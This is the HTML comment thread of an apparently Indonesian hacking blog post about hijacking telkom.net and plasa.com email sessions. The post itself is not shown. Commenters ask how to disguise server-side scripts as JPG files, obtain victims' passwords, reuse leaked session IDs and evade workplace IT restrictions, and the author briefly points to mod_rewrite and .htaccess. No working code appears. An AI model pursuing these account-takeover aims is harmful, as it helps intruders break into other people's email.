					<img alt='' src='http://1.gravatar.com/avatar/ac464089d31752c60bea42b95a357f67?s=48&d=mm&r=g' srcset='http://1.gravatar.com/avatar/ac464089d31752c60bea42b95a357f67?s=96&d=mm&r=g 2x' class='avatar avatar-48 photo u-photo' height='48' width='48' loading='lazy'/>					<cite class="fn">Aldo</cite>									</div>
				<!-- .comment-author .vcard -->
				<div class="comment-meta commentmetadata">
					<a href="http://www.ilmuhacking.com/web-security/hacking-email-telkomnet-dan-plasacom/#comment-295">
						<time pubdate datetime="2009-06-23T10:31:49+07:00">
							June 23, 2009						</time>
					</a>
									</div>
				<!-- .comment-meta .commentmetadata -->
			</footer>

			<div class="comment-content "><p>cara nge-masking Server side script ke file jpg nya gimana mas??</p>
</div>

			<div class="reply">
				<a rel='nofollow' class='comment-reply-link' href='#comment-295' data-commentid="295" data-postid="1298" data-belowelement="comment-295" data-respondelement="respond" data-replyto="Reply to Aldo" aria-label='Reply to Aldo'>Reply to Aldo</a>			</div>
			<!-- .reply -->
		</article><!-- #comment-## -->
		</li><!-- #comment-## -->
		<li class="comment byuser comment-author-admin bypostauthor even thread-even depth-1 u-comment h-cite" id="li-comment-296">
		<article id="comment-296" class="comment">
			<footer>
				<div class="comment-author vcard">
					<img alt='' src='http://0.gravatar.com/avatar/02817777ecc084a3371ad06706530c81?s=48&d=mm&r=g' srcset='http://0.gravatar.com/avatar/02817777ecc084a3371ad06706530c81?s=96&d=mm&r=g 2x' class='avatar avatar-48 photo u-photo' height='48' width='48' loading='lazy'/>					<cite class="fn"><a href='http://www.ilmuhacking.com' rel='external nofollow ugc' class='url'>Rizki Wicaksono</a></cite>									</div>
				<!-- .comment-author .vcard -->
				<div class="comment-meta commentmetadata">
					<a href="http://www.ilmuhacking.com/web-security/hacking-email-telkomnet-dan-plasacom/#comment-296">
						<time pubdate datetime="2009-06-24T11:40:25+07:00">
							June 24, 2009						</time>
					</a>
									</div>
				<!-- .comment-meta .commentmetadata -->
			</footer>

			<div class="comment-content "><p><a href="#comment-295" rel="nofollow">@Aldo</a><br />
caranya pake mod_rewrite dan .htaccess, coba baca lagi, sudah saya jelaskan</p>
</div>

			<div class="reply">
				<a rel='nofollow' class='comment-reply-link' href='#comment-296' data-commentid="296" data-postid="1298" data-belowelement="comment-296" data-respondelement="respond" data-replyto="Reply to Rizki Wicaksono" aria-label='Reply to Rizki Wicaksono'>Reply to Rizki</a>			</div>
			<!-- .reply -->
		</article><!-- #comment-## -->
		</li><!-- #comment-## -->
		<li class="comment odd alt thread-odd thread-alt depth-1 u-comment h-cite" id="li-comment-322">
		<article id="comment-322" class="comment">
			<footer>
				<div class="comment-author vcard">
					<img alt='' src='http://0.gravatar.com/avatar/668c56bf8a8a2e519ebb42f1796797f8?s=48&d=mm&r=g' srcset='http://0.gravatar.com/avatar/668c56bf8a8a2e519ebb42f1796797f8?s=96&d=mm&r=g 2x' class='avatar avatar-48 photo u-photo' height='48' width='48' loading='lazy'/>					<cite class="fn">paulplaun</cite>									</div>
				<!-- .comment-author .vcard -->
				<div class="comment-meta commentmetadata">
					<a href="http://www.ilmuhacking.com/web-security/hacking-email-telkomnet-dan-plasacom/#comment-322">
						<time pubdate datetime="2009-07-13T01:55:32+07:00">
							July 13, 2009						</time>
					</a>
									</div>
				<!-- .comment-meta .commentmetadata -->
			</footer>

			<div class="comment-content "><p>terus gimana kita bisa tau password si korban mas???</p>
</div>

			<div class="reply">
				<a rel='nofollow' class='comment-reply-link' href='#comment-322' data-commentid="322" data-postid="1298" data-belowelement="comment-322" data-respondelement="respond" data-replyto="Reply to paulplaun" aria-label='Reply to paulplaun'>Reply to paulplaun</a>			</div>
			<!-- .reply -->
		</article><!-- #comment-## -->
		</li><!-- #comment-## -->
		<li class="comment even thread-even depth-1 u-comment h-cite" id="li-comment-362">
		<article id="comment-362" class="comment">
			<footer>
				<div class="comment-author vcard">
					<img alt='' src='http://0.gravatar.com/avatar/98540731491199ebd71a6b9f76f3334e?s=48&d=mm&r=g' srcset='http://0.gravatar.com/avatar/98540731491199ebd71a6b9f76f3334e?s=96&d=mm&r=g 2x' class='avatar avatar-48 photo u-photo' height='48' width='48' loading='lazy'/>					<cite class="fn">aldy</cite>									</div>
				<!-- .comment-author .vcard -->
				<div class="comment-meta commentmetadata">
					<a href="http://www.ilmuhacking.com/web-security/hacking-email-telkomnet-dan-plasacom/#comment-362">
						<time pubdate datetime="2009-08-03T01:45:54+07:00">
							August 3, 2009						</time>
					</a>
									</div>
				<!-- .comment-meta .commentmetadata -->
			</footer>

			<div class="comment-content "><p>qta tau passwordnya dari mana trus cara ngemasking programnya kemana???thq</p>
</div>

			<div class="reply">
				<a rel='nofollow' class='comment-reply-link' href='#comment-362' data-commentid="362" data-postid="1298" data-belowelement="comment-362" data-respondelement="respond" data-replyto="Reply to aldy" aria-label='Reply to aldy'>Reply to aldy</a>			</div>
			<!-- .reply -->
		</article><!-- #comment-## -->
		</li><!-- #comment-## -->
		<li class="comment odd alt thread-odd thread-alt depth-1 u-comment h-cite" id="li-comment-377">
		<article id="comment-377" class="comment">
			<footer>
				<div class="comment-author vcard">
					<img alt='' src='http://0.gravatar.com/avatar/078a0f49ed8752c2a74b91b60b825f38?s=48&d=mm&r=g' srcset='http://0.gravatar.com/avatar/078a0f49ed8752c2a74b91b60b825f38?s=96&d=mm&r=g 2x' class='avatar avatar-48 photo u-photo' height='48' width='48' loading='lazy'/>					<cite class="fn"><a href='http://bintangweb.com' rel='external nofollow ugc' class='url'>Bintang</a></cite>									</div>
				<!-- .comment-author .vcard -->
				<div class="comment-meta commentmetadata">
					<a href="http://www.ilmuhacking.com/web-security/hacking-email-telkomnet-dan-plasacom/#comment-377">
						<time pubdate datetime="2009-08-17T11:07:10+07:00">
							August 17, 2009						</time>
					</a>
									</div>
				<!-- .comment-meta .commentmetadata -->
			</footer>

			<div class="comment-content "><p>Artikel yg sangat menarik. </p>
<p>Saya pernah menemukan script toko online buatan lokal yg mempunyai kelemahan seperti ini. Bahkan di google kelihatan sessionID-nya. Bisakah dihack ? Bukankah session ada expire-nya ?</p>
</div>

			<div class="reply">
				<a rel='nofollow' class='comment-reply-link' href='#comment-377' data-commentid="377" data-postid="1298" data-belowelement="comment-377" data-respondelement="respond" data-replyto="Reply to Bintang" aria-label='Reply to Bintang'>Reply to Bintang</a>			</div>
			<!-- .reply -->
		</article><!-- #comment-## -->
		</li><!-- #comment-## -->
		<li class="comment even thread-even depth-1 u-comment h-cite" id="li-comment-403">
		<article id="comment-403" class="comment">
			<footer>
				<div class="comment-author vcard">
					<img alt='' src='http://0.gravatar.com/avatar/32f1e8055d71446cc627ebd28582dc3e?s=48&d=mm&r=g' srcset='http://0.gravatar.com/avatar/32f1e8055d71446cc627ebd28582dc3e?s=96&d=mm&r=g 2x' class='avatar avatar-48 photo u-photo' height='48' width='48' loading='lazy'/>					<cite class="fn">hahan</cite>									</div>
				<!-- .comment-author .vcard -->
				<div class="comment-meta commentmetadata">
					<a href="http://www.ilmuhacking.com/web-security/hacking-email-telkomnet-dan-plasacom/#comment-403">
						<time pubdate datetime="2009-09-15T14:40:40+07:00">
							September 15, 2009						</time>
					</a>
									</div>
				<!-- .comment-meta .commentmetadata -->
			</footer>

			<div class="comment-content "><p>:lol sesion buat hack,.. susah oi.. setiap session pasti ada time nya<br />
lo get session si victim setelah itu lo pake di komp lo gak bakalan nembus tu password nya.</p>
</div>

			<div class="reply">
				<a rel='nofollow' class='comment-reply-link' href='#comment-403' data-commentid="403" data-postid="1298" data-belowelement="comment-403" data-respondelement="respond" data-replyto="Reply to hahan" aria-label='Reply to hahan'>Reply to hahan</a>			</div>
			<!-- .reply -->
		</article><!-- #comment-## -->
		</li><!-- #comment-## -->
		<li class="comment odd alt thread-odd thread-alt depth-1 u-comment h-cite" id="li-comment-414">
		<article id="comment-414" class="comment">
			<footer>
				<div class="comment-author vcard">
					<img alt='' src='http://1.gravatar.com/avatar/470a9534991cfd7712a7fe897665cf30?s=48&d=mm&r=g' srcset='http://1.gravatar.com/avatar/470a9534991cfd7712a7fe897665cf30?s=96&d=mm&r=g 2x' class='avatar avatar-48 photo u-photo' height='48' width='48' loading='lazy'/>					<cite class="fn"><a href='http://brokenheartplus.blogspot.com/2009/09/adsense-trick.html' rel='external nofollow ugc' class='url'>Azhar</a></cite>									</div>
				<!-- .comment-author .vcard -->
				<div class="comment-meta commentmetadata">
					<a href="http://www.ilmuhacking.com/web-security/hacking-email-telkomnet-dan-plasacom/#comment-414">
						<time pubdate datetime="2009-09-29T14:20:43+07:00">
							September 29, 2009						</time>
					</a>
									</div>
				<!-- .comment-meta .commentmetadata -->
			</footer>

			<div class="comment-content "><p>Mas, hebat juga, tapi, memang kesalahan telkom, karena tidak memakai http security, makanya, ada orang iseng yang mau bajak tuh, met kenal deh mas.</p>
</div>

			<div class="reply">
				<a rel='nofollow' class='comment-reply-link' href='#comment-414' data-commentid="414" data-postid="1298" data-belowelement="comment-414" data-respondelement="respond" data-replyto="Reply to Azhar" aria-label='Reply to Azhar'>Reply to Azhar</a>			</div>
			<!-- .reply -->
		</article><!-- #comment-## -->
		</li><!-- #comment-## -->
		<li class="comment even thread-even depth-1 u-comment h-cite" id="li-comment-422">
		<article id="comment-422" class="comment">
			<footer>
				<div class="comment-author vcard">
					<img alt='' src='http://0.gravatar.com/avatar/6f7ac0b182928ce8eabfe1a4a2ce6fc0?s=48&d=mm&r=g' srcset='http://0.gravatar.com/avatar/6f7ac0b182928ce8eabfe1a4a2ce6fc0?s=96&d=mm&r=g 2x' class='avatar avatar-48 photo u-photo' height='48' width='48' loading='lazy'/>					<cite class="fn">Triagus Setiawan</cite>									</div>
				<!-- .comment-author .vcard -->
				<div class="comment-meta commentmetadata">
					<a href="http://www.ilmuhacking.com/web-security/hacking-email-telkomnet-dan-plasacom/#comment-422">
						<time pubdate datetime="2009-10-11T23:42:07+07:00">
							October 11, 2009						</time>
					</a>
									</div>
				<!-- .comment-meta .commentmetadata -->
			</footer>

			<div class="comment-content "><p>Salut deh buat sampean, msh muda pinter lagi.<br />
Mas, tolong bantu aq, gue mo internetan tanpa batas tp komputer dibatasi oleh para IT, jadi gat bisa Facebookan dan download software.</p>
<p>Thanks…….</p>
</div>

			<div class="reply">
				<a rel='nofollow' class='comment-reply-link' href='#comment-422' data-commentid="422" data-postid="1298" data-belowelement="comment-422" data-respondelement="respond" data-replyto="Reply to Triagus Setiawan" aria-label='Reply to Triagus Setiawan'>Reply to Triagus</a>			</div>
			<!-- .reply -->
		</article><!-- #comment-## -->
		</li><!-- #comment-## -->
		<li class="comment odd alt thread-odd thread-alt depth-1 u-comment h-cite" id="li-comment-428">
		<article id="comment-428" class="comment">
			<footer>
				<div class="comment-author vcard">
					<img alt='' src='http://2.gravatar.com/avatar/e6af768e56e6aac32810aa4dfd1c1134?s=48&d=mm&r=g' srcset='http://2.gravatar.com/avatar/e6af768e56e6aac32810aa4dfd1c1134?s=96&d=mm&r=g 2x' class='avatar avatar-48 photo u-photo' height='48' width='48' loading='lazy'/>					<cite class="fn"><a href='http://metalcorr.blogspot.com/2009/10/kerja-keras-adalah-energi-kita-bbm.html' rel='external nofollow ugc' class='url'>kerja keras</a></cite>									</div>
				<!-- .comment-author .vcard -->
				<div class="comment-meta commentmetadata">
					<a href="http://www.ilmuhacking.com/web-security/hacking-email-telkomnet-dan-plasacom/#comment-428">
						<time pubdate datetime="2009-10-18T08:17:19+07:00">
							October 18, 2009						</time>
					</a>
									</div>
				<!-- .comment-meta .commentmetadata -->
			</footer>

			<div class="comment-content "><p>emang sekarang masih bisa di pake yach mas?</p>
</div>

			<div class="reply">
				<a rel='nofollow' class='comment-reply-link' href='#comment-428' data-commentid="428" data-postid="1298" data-belowelement="comment-428" data-respondelement="respond" data-replyto="Reply to kerja keras" aria-label='Reply to kerja keras'>Reply to kerja</a>			</div>
			<!-- .reply -->
		</article><!-- #comment-## -->
		</li><!-- #comment-## -->
		<li class="comment even thread-even depth-1 u-comment h-cite" id="li-comment-468">
		<article id="comment-468" class="comment">
			<footer>
				<div class="comment-author vcard">
					<img alt='' src='http://0.gravatar.com/avatar/fe28545f02de8e26652b7c001e48d753?s=48&d=mm&r=g' srcset='http://0.gravatar.com/avatar/fe28545f02de8e26652b7c001e48d753?s=96&d=mm&r=g 2x' class='avatar avatar-48 photo u-photo' height='48' width='48' loading='lazy'/>					<cite class="fn">Ranjan Kumar</cite>									</div>
				<!-- .comment-author .vcard -->
				<div class="comment-meta commentmetadata">
					<a href="http://www.ilmuhacking.com/web-security/hacking-email-telkomnet-dan-plasacom/#comment-468">
						<time pubdate datetime="2009-12-16T17:50:37+07:00">
							December 16, 2009						</time>
					</a>
									</div>
				<!-- .comment-meta .commentmetadata -->
			</footer>

			<div class="comment-content "><p>BOSS boss yang tau tentang IT tolong bantu email saya udah 3 bulan hack oleh orang lain jadi gak bisa bisa buka lagi. Email id saya <a href="mailto:ranjankumar@telkomsel.net">ranjankumar@telkomsel.net</a> bagaimana cara bisa retrieve password saya atau bisa tutup selamanya. Karena itu adalah business mail saya dan sudah hacking oleh musuh yang tidak etika. Tolong  bantu ya.</p>
</div>

			<div class="reply">
				<a rel='nofollow' class='comment-reply-link' href='#comment-468' data-commentid="468" data-postid="1298" data-belowelement="comment-468" data-respondelement="respond" data-replyto="Reply to Ranjan Kumar" aria-label='Reply to Ranjan Kumar'>Reply to Ranjan</a>			</div>
			<!-- .reply -->
		</article><!-- #comment-## -->
		</li><!-- #comment-## -->
		<li class="comment odd alt thread-odd thread-alt depth-1 u-comment h-cite" id="li-comment-678">
		<article id="comment-678" class="comment">
			<footer>
				<div class="comment-author vcard">
					<img alt='' src='http://0.gravatar.com/avatar/9c1769ca2cb83741a61c296e17811a06?s=48&d=mm&r=g' srcset='http://0.gravatar.com/avatar/9c1769ca2cb83741a61c296e17811a06?s=96&d=mm&r=g 2x' class='avatar avatar-48 photo u-photo' height='48' width='48' loading='lazy'/>					<cite class="fn">spinhulk</cite>									</div>
				<!-- .comment-author .vcard -->
				<div class="comment-meta commentmetadata">
					<a href="http://www.ilmuhacking.com/web-security/hacking-email-telkomnet-dan-plasacom/#comment-678">
						<time pubdate datetime="2010-06-14T02:11:50+07:00">
							June 14, 2010						</time>
					</a>
									</div>
				<!-- .comment-meta .commentmetadata -->
			</footer>

			<div class="comment-content "><p>mas aq mau tanya nie ..?????????????qlo aq udah tau kode md5 nya terus untuk mgetahui email korbanya gimana ya mas tlng pncerahanya ya mas soalnya lg belajar nie hehehehhe………</p>
</div>

			<div class="reply">
				<a rel='nofollow' class='comment-reply-link' href='#comment-678' data-commentid="678" data-postid="1298" data-belowelement="comment-678" data-respondelement="respond" data-replyto="Reply to spinhulk" aria-label='Reply to spinhulk'>Reply to spinhulk</a>			</div>
			<!-- .reply -->
		</article><!-- #comment-## -->
		</li><!-- #comment-## -->
		<li class="comment even thread-even depth-1 u-comment h-cite" id="li-comment-8740">
		<article id="comment-8740" class="comment">
			<footer>
				<div class="comment-author vcard">
					<img alt='' src='http://2.gravatar.com/avatar/e85149b05bba0cd40b8c6d0a35ebe567?s=48&d=mm&r=g' srcset='http://2.gravatar.com/avatar/e85149b05bba0cd40b8c6d0a35ebe567?s=96&d=mm&r=g 2x' class='avatar avatar-48 photo u-photo' height='48' width='48' loading='lazy'/>					<cite class="fn">indrasung</cite>									</div>
				<!-- .comment-author .vcard -->
				<div class="comment-meta commentmetadata">
					<a href="http://www.ilmuhacking.com/web-security/hacking-email-telkomnet-dan-plasacom/#comment-8740">
						<time pubdate datetime="2011-11-25T16:21:50+07:00">
							November 25, 2011						</time>
					</a>
									</div>
				<!-- .comment-meta .commentmetadata -->
			</footer>

			<div class="comment-content "><p>Mas, artikelnya bagus, sayang saya tidak begitu mengerti detailnya.<br />
Minta tolong ya Mas, dulu saya punya 2 e-mail di telkom.net.<br />
Entah kenapa sekarang ke2 nya tidak bisa diakses, walaupun password sudah betul.<br />
Gimana ya caranya, sebab ada file penting di folder yang mau saya akses. KAlau log in selalu gak bisa. Apakah telkom.net ini sekarang sudah tidak aktif lagi ?<br />
Terima ksih.</p>
</div>

			<div class="reply">
				<a rel='nofollow' class='comment-reply-link' href='#comment-8740' data-commentid="8740" data-postid="1298" data-belowelement="comment-8740" data-respondelement="respond" data-replyto="Reply to indrasung" aria-label='Reply to indrasung'>Reply to indrasung</a>			</div>
			<!-- .reply -->
		</article><!-- #comment-## -->
		</li><!-- #comment-## -->
		<li class="comment odd alt thread-odd thread-alt depth-1 u-comment h-cite" id="li-comment-22834">
		<article id="comment-22834" class="comment">
			<footer>
				<div class="comment-author vcard">
					<img alt='' src='http://2.gravatar.com/avatar/89b42f492ab827eb594d1f1c50733ff1?s=48&d=mm&r=g' srcset='http://2.gravatar.com/avatar/89b42f492ab827eb594d1f1c50733ff1?s=96&d=mm&r=g 2x' class='avatar avatar-48 photo u-photo' height='48' width='48' loading='lazy'/>					<cite class="fn"><a href='http://ro-tea.blogspot.com' rel='external nofollow ugc' class='url'>Romatua</a></cite>									</div>
				<!-- .comment-author .vcard -->
				<div class="comment-meta commentmetadata">
					<a href="http://www.ilmuhacking.com/web-security/hacking-email-telkomnet-dan-plasacom/#comment-22834">
						<time pubdate datetime="2013-05-12T21:14:08+07:00">
							May 12, 2013						</time>
					</a>
									</div>
				<!-- .comment-meta .commentmetadata -->
			</footer>

			<div class="comment-content "><p>wiidihh, mantap x bro..<br />
perlu untuk dicoba, penasaran banget..<br />
terimakasih artikelnya gan..</p>
</div>

			<div class="reply">
				<a rel='nofollow' class='comment-reply-link' href='#comment-22834' data-commentid="22834" data-postid="1298" data-belowelement="comment-22834" data-respondelement="respond" data-replyto="Reply to Romatua" aria-label='Reply to Romatua'>Reply to Romatua</a>			</div>
			<!-- .reply -->
		</article><!-- #comment-## -->
		</li><!-- #comment-## -->
			</ol><!-- .commentlist -->

			
		
		
		
			
			<div id="share-comment-button-bottom">
				<button>
					<i class="share-comment-icon"></i>Write a Comment				</button>
			</div>
			<div id="commentform-bottom"></div> <!-- do not remove; used by jQuery to move the comment reply form here -->
		
		
							
	</div><!-- #comments .comments-area -->


				
				<div id="taglist"><ul class="taglist"><li class="taglist-title">Related Content by Tag</li><li><a href="http://www.ilmuhacking.com/tag/email/" rel="tag">email</a></li><li><a href="http://www.ilmuhacking.com/tag/hijacking/" rel="tag">hijacking</a></li><li><a href="http://www.ilmuhacking.com/tag/plasacom/" rel="tag">plasa.com</a></li><li><a href="http://www.ilmuhacking.com/tag/session/" rel="tag">session</a></li><li><a href="http://www.ilmuhacking.com/tag/telkomnet/" rel="tag">telkom.net</a></li></ul></div>
			
		</main>
		<!-- #content .site-content -->
	</div><!-- #primary .content-area -->

<div id="secondary" class="widget-area" role="complementary">
	</div><!-- #secondary .widget-area -->

</div><!-- #main .site-main -->

<footer id="colophon" class="site-footer" itemscope="itemscope" itemtype="http://schema.org/WPFooter" role="contentinfo">
	<div class="site-info">
		<a href="http://independentpublisher.me" rel="designer" title="Independent Publisher: A beautiful reader-focused WordPress theme, for you.">Independent Publisher</a> empowered by <a href="http://wordpress.org/" rel="generator" title="WordPress: A free open-source publishing platform">WordPress</a>	</div>
	<!-- .site-info -->
</footer><!-- #colophon .site-footer -->
</div><!-- #page .hfeed .site -->

<script type='text/javascript' src='http://www.ilmuhacking.com/wp-content/themes/independent-publisher/js/skip-link-focus-fix.js?ver=20130115' id='independent-publisher-skip-link-focus-fix-js'></script>
<script type='text/javascript' src='http://www.ilmuhacking.com/wp-includes/js/comment-reply.min.js?ver=5.6.13' id='comment-reply-js'></script>
<script type='text/javascript' src='http://www.ilmuhacking.com/wp-includes/js/wp-embed.min.js?ver=5.6.13' id='wp-embed-js'></script>
<script async="async" type='text/javascript' src='http://www.ilmuhacking.com/wp-content/plugins/akismet/_inc/form.js?ver=4.1.6' id='akismet-form-js'></script>

</body>
</html>